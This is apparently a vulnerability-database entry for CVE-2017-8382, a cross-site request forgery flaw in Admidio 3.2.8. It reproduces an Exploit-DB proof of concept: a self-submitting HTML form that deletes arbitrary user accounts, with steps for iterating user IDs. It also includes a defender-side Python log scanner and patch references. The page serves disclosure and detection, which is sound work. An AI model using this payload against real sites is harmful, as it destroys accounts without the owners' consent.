CVE-2017-8382
medium
CVSS v3
4.5
CVSS v4
n/a
VIR risk
5.5
Description
Admidio CSRF vulnerability
Predictions
Exploit likelihood
55%
Patch ETA
n/a
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Admidio 3.2.8 - Cross-Site Request Forgery
# Exploit Title: Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi | Organization: Provensec LLC | Website: http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE: CVE-2017-8382
[Suggested description]
Admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.
------------------------------------------
[Additional Information]
Using this crafted HTML form we are able to delete any user with admin/user privilege.

```html
<html>
<body onload="javascript:document.forms[0].submit()">
<form action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='9' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
```
[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Attack Vectors]
Steps:
1.) If a user with admin privilege opens a crafted HTML/JPEG (image), then both the admin and the users with user privilege whose user IDs are given in the crafted request (as shown below) are deleted.
`<input type="hidden" name="usr_id" value='3' />`
2.) In Admidio the user ID starts from '0' by default: '1' is for the system and '2' for users, so an attacker can start from '2' up to 'n' users.
3.) For deleting the user permanently we select 'mode=3' (as shown below); then all admin/low-privileged users are deleted.
`<input type="hidden" name="mode" value="3" />`
------------------------------------------
[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Thanks
Faiz Ahmed Zaidi
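As an added, defender-side example that is not part of the advisory above or of the Admidio project: the Python below scans Apache combined-format access log lines for the request shape the PoC produces, a request to members_function.php carrying mode=3 whose Referer is absent or from a host other than the application's own. The log lines, IP addresses, host names and the /admidio install path are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the page). The first two have the PoC's shape:
# a GET to members_function.php with mode=3, referred from an off-site page or with no
# Referer at all. The third is an in-app delete with a same-site Referer, the fourth is noise.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Apr/2017:10:12:01 +0000] "GET /admidio/adm_program/modules/members/members_function.php?usr_id=9&mode=3 HTTP/1.1" 302 0 "http://evil.example/poc.html" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2017:10:12:03 +0000] "GET /admidio/adm_program/modules/members/members_function.php?usr_id=3&mode=3 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [28/Apr/2017:10:13:00 +0000] "GET /admidio/adm_program/modules/members/members_function.php?usr_id=12&mode=3 HTTP/1.1" 302 0 "https://intranet.example/admidio/adm_program/modules/members/members.php" "Mozilla/5.0"
198.51.100.4 - - [28/Apr/2017:10:13:30 +0000] "GET /admidio/adm_program/modules/members/members.php HTTP/1.1" 200 5120 "https://intranet.example/admidio/" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Affected component named in the advisory (path suffix, so any install prefix matches).
ENDPOINT = "/adm_program/modules/members/members_function.php"


def flag_csrf_deletes(log_text: str, app_host: str) -> list:
    """Return entries that look like the advisory's CSRF-driven delete: a request to
    members_function.php with mode=3 whose Referer is missing or from a host other
    than app_host (the host the application itself is served from)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        if not parts.path.endswith(ENDPOINT):
            continue
        query = parse_qs(parts.query)
        if query.get("mode") != ["3"]:
            continue  # only the permanent-delete mode the PoC uses
        referer = m["referer"]
        ref_host = None if referer == "-" else urlsplit(referer).hostname
        if ref_host != app_host:
            hits.append({"ip": m["ip"], "ts": m["ts"], "referer": referer,
                         "usr_id": query.get("usr_id", [None])[0]})
    return hits


if __name__ == "__main__":
    for hit in flag_csrf_deletes(SAMPLE_LOG, "intranet.example"):
        print(hit)
```

A missing Referer can also come from browser privacy settings or a proxy, so treat a hit as a triage lead to confirm against the application's own audit trail, not as proof of compromise.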
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Packagist | admidio/admidio | <4.1-Beta.1 | 4.1-Beta.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| admidio | admidio | 3.2.8 | |
References
- http://en.0day.today/exploit/27771
- https://github.com/Admidio/admidio/issues/612
- https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc
- https://www.exploit-db.com/exploits/42005/
- https://nvd.nist.gov/vuln/detail/CVE-2017-8382
- https://github.com/Admidio/admidio/pull/1074
- https://github.com/Admidio/admidio/commit/a7ac9d3c9e0780e877fe9ac846ac64b284de8553
- https://github.com/Admidio/admidio
CWEs
CWE-352: Cross-Site Request Forgery (CSRF)